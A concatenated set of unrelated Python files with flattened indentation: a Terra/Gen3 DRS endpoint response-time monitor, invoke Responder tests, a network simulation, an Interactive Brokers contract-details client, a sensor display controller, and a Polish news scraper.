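    # Illustrative example with hypothetical values: an input of
    #   {"martha": {"start_time": 1600000000.0, "response_duration": 0.42,
    #               "response_code": 200, "response_reason": "OK"}}
    # flattens to
    #   {"martha.start_time": "<formatted UTC timestamp>",
    #    "martha.response_duration": 0.42, "martha.response_code": 200,
    #    "martha.response_reason": "OK"}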
@staticmethod
def get_output_filepath(output_filename: str):
global output_dir
return os.path.join(output_dir, output_filename)
def write_monitoring_info_to_csv(self, monitoring_info_dict: dict, output_filename: str) -> None:
output_filename = self.get_output_filepath(output_filename)
        write_header = not Path(output_filename).exists()
row_info = self.flatten_monitoring_info_dict(monitoring_info_dict)
with open(output_filename, 'a', newline='') as csvfile:
fieldnames = sorted(row_info.keys())
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
if write_header:
writer.writeheader()
writer.writerow(row_info)
class TerraMethods(MonitoringUtilityMethods):
def __init__(self):
super().__init__()
self._terra_info = DeploymentInfo.terra_factory()
self._gen3_info = DeploymentInfo.gen3_factory()
# When run in Terra, this returns the Terra user pet SA token
@staticmethod
def get_terra_user_pet_sa_token() -> str:
import google.auth.transport.requests
creds, projects = google.auth.default()
creds.refresh(google.auth.transport.requests.Request())
token = creds.token
return token
def get_external_identity_link_url_from_bond(self) -> Tuple[str, dict]:
headers = {
'content-type': "*/*"
}
start_time = time.time()
resp = requests.options(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/authorization-url?scopes=openid&scopes=google_credentials&scopes=data&scopes=user&redirect_uri=https://app.terra.bio/#fence-callback&state=eyJwcm92aWRlciI6ImZlbmNlIn0=",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
link_url = resp.url if resp.ok else None
return link_url, self.monitoring_info(start_time, resp)
def get_external_identity_status_from_bond(self, terra_user_token: str) -> Tuple[dict, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
def get_fence_token_from_bond(self, terra_user_token: str) -> Tuple[str, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/accesstoken",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
token = resp.json().get('token') if resp.ok else None
return token, self.monitoring_info(start_time, resp)
def get_service_account_key_from_bond(self, terra_user_token: str) -> Tuple[dict, dict]:
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(
f"https://{self._terra_info.bond_host}/api/link/v1/{self._terra_info.bond_provider}/serviceaccount/key",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
sa_key = resp.json().get('data') if resp.ok else None
return sa_key, self.monitoring_info(start_time, resp)
def get_martha_drs_response(self, terra_user_token: str, drs_uri: str = None) -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self._gen3_info.public_drs_uri
headers = {
'authorization': f"Bearer {terra_user_token}",
'content-type': "application/json"
}
# Request the same fields as the Terra workflow DRS Localizer does.
data = json.dumps(dict(url=drs_uri, fields=['gsUri', 'googleServiceAccount', 'accessUrl', 'hashes']))
start_time = time.time()
resp = requests.post(f"https://{self._terra_info.martha_host}/martha_v3/",
headers=headers, data=data)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
class Gen3Methods(MonitoringUtilityMethods):
def __init__(self):
super().__init__()
self.gen3_info = DeploymentInfo.gen3_factory()
def get_gen3_drs_resolution(self, drs_uri: str = None) -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self.gen3_info.public_drs_uri
assert drs_uri.startswith("drs://")
object_id = drs_uri.split(":")[-1]
headers = {
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/ga4gh/drs/v1/objects/{object_id}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
@staticmethod
def _get_drs_access_id(drs_response: dict, cloud_uri_scheme: str) -> Optional[Any]:
for access_method in drs_response['access_methods']:
if access_method['type'] == cloud_uri_scheme:
return access_method['access_id']
return None
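    # Hedged sketch of the DRS response shape this helper assumes (field names
    # follow the GA4GH DRS spec; the values below are made up):
    #   {"access_methods": [{"type": "gs", "access_id": "gs", ...},
    #                       {"type": "https", "access_id": "https", ...}]}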
def get_gen3_drs_access(self, fence_user_token: str, drs_uri: str = None,
access_id: str = "gs") -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self.gen3_info.public_drs_uri
assert drs_uri.startswith("drs://")
object_id = drs_uri.split(":")[-1]
headers = {
'authorization': f"Bearer {fence_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/ga4gh/drs/v1/objects/{object_id}/access/{access_id}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
access_url = resp.json().get('url') if resp.ok else None
return access_url, self.monitoring_info(start_time, resp)
def get_fence_userinfo(self, fence_user_token: str):
headers = {
'authorization': f"Bearer {fence_user_token}",
'content-type': "application/json",
'accept': '*/*'
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/user/user/", headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
class Scheduler:
def __init__(self):
super().__init__()
self.stop_run_continuously = None
@staticmethod
def run_continuously(interval=1):
"""Continuously run, while executing pending jobs at each
elapsed time interval.
        @return cease_continuous_run: threading.Event which can
be set to cease continuous run. Please note that it is
*intended behavior that run_continuously() does not run
missed jobs*. For example, if you've registered a job that
should run every minute, and you set a continuous run
interval of one hour then your job won't be run 60 times
at each interval but only once.
"""
cease_continuous_run = threading.Event()
class ScheduleThread(threading.Thread):
def __init__(self):
super().__init__()
def run(self):
while not cease_continuous_run.is_set():
schedule.run_pending()
time.sleep(interval)
continuous_thread = ScheduleThread()
continuous_thread.start()
return cease_continuous_run
@staticmethod
def run_threaded(job_func):
job_thread = Thread(target=job_func)
job_thread.start()
def start_monitoring(self):
logger.info("Starting background response time monitoring")
self.stop_run_continuously = self.run_continuously()
def stop_monitoring(self):
logger.info("Stopping background response time monitoring")
self.stop_run_continuously.set()
def catch_exceptions(cancel_on_failure=False):
def catch_exceptions_decorator(job_func):
@functools.wraps(job_func)
def wrapper(*args, **kwargs):
# noinspection PyBroadException
try:
return job_func(*args, **kwargs)
except:
import traceback
logger.error(traceback.format_exc())
if cancel_on_failure:
return schedule.CancelJob
return wrapper
return catch_exceptions_decorator
class ResponseTimeMonitor(Scheduler):
interval_seconds = 30
def __init__(self):
super().__init__()
class AbstractResponseTimeReporter(ABC):
def __init__(self, output_filename):
super().__init__()
self.output_filename = output_filename
@abstractmethod
def measure_and_report(self):
pass
class DrsFlowResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods, Gen3Methods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
try:
terra_user_token = self.get_terra_user_pet_sa_token()
# Get DRS metadata from Gen3 Indexd
drs_metadata, mon_info = self.get_gen3_drs_resolution()
monitoring_infos['indexd_get_metadata'] = mon_info
# Get service account key from Bond
sa_key, mon_info = self.get_service_account_key_from_bond(terra_user_token)
monitoring_infos['bond_get_sa_key'] = mon_info
# Get Fence user token from Bond
fence_user_token, mon_info = self.get_fence_token_from_bond(terra_user_token)
monitoring_infos['bond_get_access_token'] = mon_info
assert fence_user_token is not None, "Failed to get Fence user token."
# Get signed URL from Fence
access_url, mon_info = self.get_gen3_drs_access(fence_user_token)
monitoring_infos['fence_get_signed_url'] = mon_info
except Exception as ex:
logger.warning(f"Exception occurred: {ex}")
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class MarthaResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
# Get Martha response time
resp_json, mon_info = self.get_martha_drs_response(terra_user_token)
monitoring_infos['martha'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class BondExternalIdentityResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
# Get Bond external identity link URL response time
link_url, mon_info = self.get_external_identity_link_url_from_bond()
monitoring_infos['bond_get_link_url'] = mon_info
# Get Bond external identity status response time
resp_json, mon_info = self.get_external_identity_status_from_bond(terra_user_token)
monitoring_infos['bond_get_link_status'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class FenceUserInfoResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods, Gen3Methods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
fence_user_token, _ = self.get_fence_token_from_bond(terra_user_token)
# Get Fence user info response time as a response time indicator for the
            # Gen3 Fence k8s partition for auth services, which is separate
# from the partition for signed URL requests.
resp_json, mon_info = self.get_fence_userinfo(fence_user_token)
monitoring_infos['fence_user_info'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
@catch_exceptions()
def check_drs_flow_response_times(self):
output_filename = "drs_flow_response_times.csv"
reporter = self.DrsFlowResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_martha_response_time(self):
output_filename = "martha_response_time.csv"
reporter = self.MarthaResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_bond_external_identity_response_times(self):
output_filename = "bond_external_idenity_response_times.csv"
reporter = self.BondExternalIdentityResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_fence_user_info_response_time(self):
output_filename = "fence_user_info_response_time.csv"
reporter = self.FenceUserInfoResponseTimeReporter(output_filename)
reporter.measure_and_report()
def configure_monitoring(self):
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_drs_flow_response_times)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_martha_response_time)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded,
self.check_bond_external_identity_response_times)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_fence_user_info_response_time)
def configure_logging(output_directory_path: str) -> logging.Logger:
log_filename = Path(os.path.join(output_directory_path, "monitor_response_times.log")).resolve().as_posix()
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(threadName)-12s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
filename=log_filename,
filemode="w",
level=logging.DEBUG)
logging.Formatter.converter = time.gmtime
print(f"Logging to file: {log_filename}")
return logging.getLogger()
def parse_arg_list(arg_list: list = None) -> argparse.Namespace:
utc_timestamp = datetime.utcnow().strftime("%Y%m%d_%H%M%S")
parser = argparse.ArgumentParser()
parser.add_argument('--project-name', type=str, required=True,
help="Project to monitor. Supported values: BDC")
parser.add_argument('--terra-deployment-tier', type=str, required=True,
help="Project to monitor. Supported values: DEV, ALPHA")
parser.add_argument('--output-dir', type=str, required=False,
default=f"./monitoring_output_{utc_timestamp}",
help="Directory to contain monitoring output files")
args = parser.parse_args(arg_list)
return args
def create_output_directory(directory_path: str) -> None:
Path(directory_path).mkdir(parents=True, exist_ok=True)
def set_configuration(args: argparse.Namespace) -> None:
global output_dir, logger
DeploymentInfo.set_project(args.project_name)
DeploymentInfo.set_terra_deployment_tier(args.terra_deployment_tier)
    # Call these now so that any configuration errors are raised immediately rather than later while running.
DeploymentInfo.terra_factory()
DeploymentInfo.gen3_factory()
create_output_directory(args.output_dir)
output_dir = args.output_dir
logger = configure_logging(args.output_dir)
logger.info("Monitoring Configuration:")
logger.info(f"Project: {args.project_name}")
logger.info(f"Terra Deployment Tier: {args.terra_deployment_tier}")
responseTimeMonitor: ResponseTimeMonitor = None
def main(arg_list: list = None) -> None:
args = parse_arg_list(arg_list)
set_configuration(args)
# Configure and start monitoring
global responseTimeMonitor
responseTimeMonitor = ResponseTimeMonitor()
responseTimeMonitor.configure_monitoring()
responseTimeMonitor.start_monitoring()
#
# Start/Stop monitoring in the current (caller's) process
#
def start_monitoring_in_current_process(terra_deployment_tier: str,
project_to_monitor: str,
monitoring_output_directory: str) -> None:
arg_list = ["--terra-deployment-tier", terra_deployment_tier,
"--project", project_to_monitor,
"--output-dir", monitoring_output_directory]
main(arg_list)
def stop_monitoring_in_current_process() -> None:
global responseTimeMonitor
responseTimeMonitor.stop_monitoring()
#
# Start/Stop monitoring using a new background process
#
def start_monitoring_background_process(terra_deployment_tier: str,
project_to_monitor: str,
monitoring_output_directory: str)\
-> psutil.Process:
print("Starting monitoring background process ...")
process = psutil.Popen(["python3",
__file__,
"--terra-deployment-tier", terra_deployment_tier,
"--project", project_to_monitor,
"--output-dir", monitoring_output_directory])
print(f"Started {process}")
return process
def stop_monitoring_background_process(process: psutil.Process) -> None:
_termination_wait_seconds = 60
print("Stopping monitoring background process ...")
process.terminate()
print("Waiting up {_termination_wait_seconds} seconds for process to terminate.")
process.wait(_termination_wait_seconds)
print("Stopped monitoring background process.")
if __name__ == "__main__":
main()
# # Run for a while
# sleep_seconds = 90
# print(f"Sleeping for {sleep_seconds} ...")
# time.sleep(sleep_seconds)
# print("Done sleeping")
#
# # Stop monitoring
# responseTimeMonitor.stop_monitoring()
|
watchers.py
|
from threading import Thread, Event
from invoke.vendor.six.moves.queue import Queue, Empty
from invoke import Responder, FailingResponder, ResponseNotAccepted
# NOTE: StreamWatcher is basically just an interface/protocol; no behavior to
# test of its own. So this file tests Responder primarily, and some subclasses.
class Responder_:
def keeps_track_of_seen_index_per_thread(self):
# Instantiate a single object which will be used in >1 thread
r = Responder(pattern='foo', response='bar fight') # meh
# Thread body func allowing us to mimic actual IO thread behavior, with
# Queues used in place of actual pipes/files
def body(responder, in_q, out_q, finished):
while not finished.is_set():
try:
# NOTE: use nowait() so our loop is hot & can shutdown ASAP
# if finished gets set.
stream = in_q.get_nowait()
for response in r.submit(stream):
out_q.put_nowait(response)
except Empty:
pass
# Create two threads from that body func, and queues/etc for each
t1_in, t1_out, t1_finished = Queue(), Queue(), Event()
t2_in, t2_out, t2_finished = Queue(), Queue(), Event()
t1 = Thread(target=body, args=(r, t1_in, t1_out, t1_finished))
t2 = Thread(target=body, args=(r, t2_in, t2_out, t2_finished))
# Start the threads
t1.start()
t2.start()
try:
stream = 'foo fighters'
# First thread will basically always work
t1_in.put(stream)
assert t1_out.get() == 'bar fight'
# Second thread get() will block/timeout if threadlocals aren't in
# use, because the 2nd thread's copy of the responder will not have
# its own index & will thus already be 'past' the `foo` in the
# stream.
t2_in.put(stream)
assert t2_out.get(timeout=1) == 'bar fight'
except Empty:
assert False, "Unable to read from thread 2 - implies threadlocal indices are broken!" # noqa
# Close up.
finally:
t1_finished.set()
t2_finished.set()
t1.join()
t2.join()
def yields_response_when_regular_string_pattern_seen(self):
r = Responder(pattern='empty', response='handed')
assert list(r.submit('the house was empty')) == ['handed']
def yields_response_when_regex_seen(self):
r = Responder(pattern=r'tech.*debt', response='pay it down')
response = r.submit("technically, it's still debt")
assert list(response) == ['pay it down']
def multiple_hits_within_stream_yield_multiple_responses(self):
r = Responder(pattern='jump', response='how high?')
assert list(r.submit('jump, wait, jump, wait')) == ['how high?'] * 2
def patterns_span_multiple_lines(self):
r = Responder(pattern=r'call.*problem', response='So sorry')
output = """
You only call me
when you have a problem
You never call me
Just to say hi
"""
assert list(r.submit(output)) == ['So sorry']
class FailingResponder_:
def behaves_like_regular_responder_by_default(self):
r = FailingResponder(
pattern='ju[^ ]{2}',
response='how high?',
sentinel='lolnope',
)
assert list(r.submit('jump, wait, jump, wait')) == ['how high?'] * 2
def raises_failure_exception_when_sentinel_detected(self):
r = FailingResponder(
pattern='ju[^ ]{2}',
response='how high?',
sentinel='lolnope',
)
# Behaves normally initially
assert list(r.submit('jump')) == ['how high?']
# But then!
try:
r.submit('lolnope')
except ResponseNotAccepted as e:
message = str(e)
# Expect useful bits in exception text
err = "Didn't see pattern in {!r}".format(message)
assert "ju[^ ]{2}" in message, err
err = "Didn't see failure sentinel in {!r}".format(message)
assert "lolnope" in message, err
else:
assert False, "Did not raise ResponseNotAccepted!"
|
simulation_2.py
|
'''
Created on Oct 12, 2016
@author: mwitt_000
'''
from src.Network import network_2
from src.Link import link_2
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_2.Host(1)
object_L.append(client)
server = network_2.Host(2)
object_L.append(server)
router_a = network_2.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_2.LinkLayer()
object_L.append(link_layer)
#add all the links
link_layer.add_link(link_2.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_2.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
    client.udt_send(2, 'Sample data must be longer than 80 characters so we added this additional text to achieve that requirement.',
link_layer.link_L[1].mtu)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
request_contract_details.py
|
# Copyright (C) 2019 LYNX B.V. All rights reserved.
# Import ibapi deps
from ibapi import wrapper
from ibapi.client import EClient
from ibapi.contract import *
from threading import Thread
from datetime import datetime
from time import sleep
CONTRACT_ID = 4001
class Wrapper(wrapper.EWrapper):
def __init__(self):
wrapper.EWrapper.__init__(self)
def contractDetails(self, reqId:int, contractDetails:ContractDetails):
"""Receives the full contract's definitions. This method will return all
        contracts matching the one requested via EClientSocket::reqContractDetails.
For example, one can obtain the whole option chain with it."""
print("marketName: ", contractDetails.marketName, "\nvalidExchanges: ", contractDetails.validExchanges,\
"\nlongName: ", contractDetails.longName, "\nminTick: ",contractDetails.minTick)
        # printinstance(contractDetails)  # uncommenting this prints all of the available contract details.
class Client(EClient):
def __init__(self, wrapper):
EClient.__init__(self, wrapper)
def get_contractDetails(self, contract, reqId = CONTRACT_ID):
# Here we are requesting contract details for the EUR.USD Contract
self.reqContractDetails(reqId, contract)
MAX_WAITED_SECONDS = 5
print("Getting contract details from the server... can take %d second to complete" % MAX_WAITED_SECONDS)
sleep(MAX_WAITED_SECONDS)
class TestApp(Wrapper, Client):
def __init__(self, ipaddress, portid, clientid):
Wrapper.__init__(self)
Client.__init__(self, wrapper=self)
self.connect(ipaddress, portid, clientid)
thread = Thread(target=self.run)
thread.start()
setattr(self, "_thread", thread)
def printinstance(inst: object):
attrs = vars(inst)
print('\n'.join("%s: %s" % item for item in attrs.items()))
def main():
app = TestApp("localhost", 7496, clientid = 0)
print("serverVersion:%s connectionTime:%s" % (app.serverVersion(),
app.twsConnectionTime()))
# Define the contract
contract = Contract()
contract.symbol = "EUR"
contract.secType = "CASH"
contract.currency = "USD"
contract.exchange = "IDEALPRO"
app.get_contractDetails(contract)
if __name__ == "__main__":
main()
|
hauptlogik.py
|
# -*- coding: utf-8 -*-
import displayController, sensorenController, ledController, schalterController, speicherung
import time, math
from apscheduler.schedulers.blocking import BlockingScheduler
from threading import Thread
versionNummer = "1.0"
displayModus = 0  # 0 = backlight off + LED on; 1 = backlight off + LED off; 2 = backlight on + LED on; 3 = backlight on + LED off; 4 = display off + LED on; 5 = display off + LED off
def start():
ledController.starten()
schalterController.starten()
displayController.startAnimation(versionNummer)
speicherung.mitMySQLVerbinden()
def aktualisieren():
[temperatur, druck, seehoehe, feuchtigkeit] = sensorenController.leseDaten()
displayController.datenAnzeige(round(temperatur,1), round(druck,1), round(seehoehe,1), feuchtigkeit)
speicherung.datenBereinigen()
speicherung.datenSpeichern(round(temperatur,3), round(druck,3), feuchtigkeit)
def schalterUeberpruefung():
while(True):
schalterController.warteAufSchalterGedrueckt()
displayModusAendern()
time.sleep(0.5)
def displayModusAendern():
global displayModus
if displayModus < 5:
displayModus += 1
else:
displayModus = 0
displayController.displayModusAendern(displayModus)
if displayModus == 1 or displayModus == 3 or displayModus == 5:
sensorenController.benutzeLED = False
speicherung.benutzeLED = False
else:
sensorenController.benutzeLED = True
speicherung.benutzeLED = True
Thread(target=schalterUeberpruefung).start()  # Calls schalterUeberpruefung asynchronously.
# Configure the script so that aktualisieren runs every 10 seconds, at the 0/10/20/30/40/50 second marks of each minute.
start()
scheduler = BlockingScheduler()
scheduler.add_job(aktualisieren, trigger='cron', second='0,10,20,30,40,50')
scheduler.start()
|
test.py
|
from Country.Poland.News.WiadomosciGazetaPl.NewsScraper import NewsScraper
from LanguageProcessing.Translation.GoogleTranslator import GoogleTranslator
from Scraper.Writters.FileWritter import FileWriter
from Requests.Requester import Requester
from threading import Thread
translator = GoogleTranslator()
# today news http://wiadomosci.gazeta.pl/wiadomosci/0,114871.html
def getArticle(url, dataset):
requester = Requester(url=url, retries=5, sleep_time=3)
response = requester.make_get_request()
html = response.data
dataset[url]["subtitle"] = (NewsScraper.parse_article_subtitle(html=html))
dataset[url]["date"] = (NewsScraper.parse_article_datetime(html=html))
dataset[url]["text"], dataset[url]["html"] = (NewsScraper.parse_article_text(html=html))
try:
translation_result = translator.get_translation(dataset[url]["text"])
dataset[url]["translation_en"] = translation_result['translation']
except Exception:
print("Translation error with url {0} and text {1}".format(url, dataset[url]["text"]))
def getNewsDataset(pages):
dataset = dict()
for page in range(pages):
url = "http://wiadomosci.gazeta.pl/wiadomosci/0,114871.html?str="+str(page+1)
requester = Requester(url=url, retries=5, sleep_time=3)
response = requester.make_get_request()
html = response.data
dataset.update(NewsScraper.parse_articles_list(url_root=requester.get_url_root(),html=html))
threads=[]
for article in dataset:
url = article
threads.append(Thread(target=getArticle, args=(url, dataset)))
threads[-1].start()
for thread in threads:
thread.join()
return dataset
writer = FileWriter("data/news.csv")
writer.write(getNewsDataset(1))
|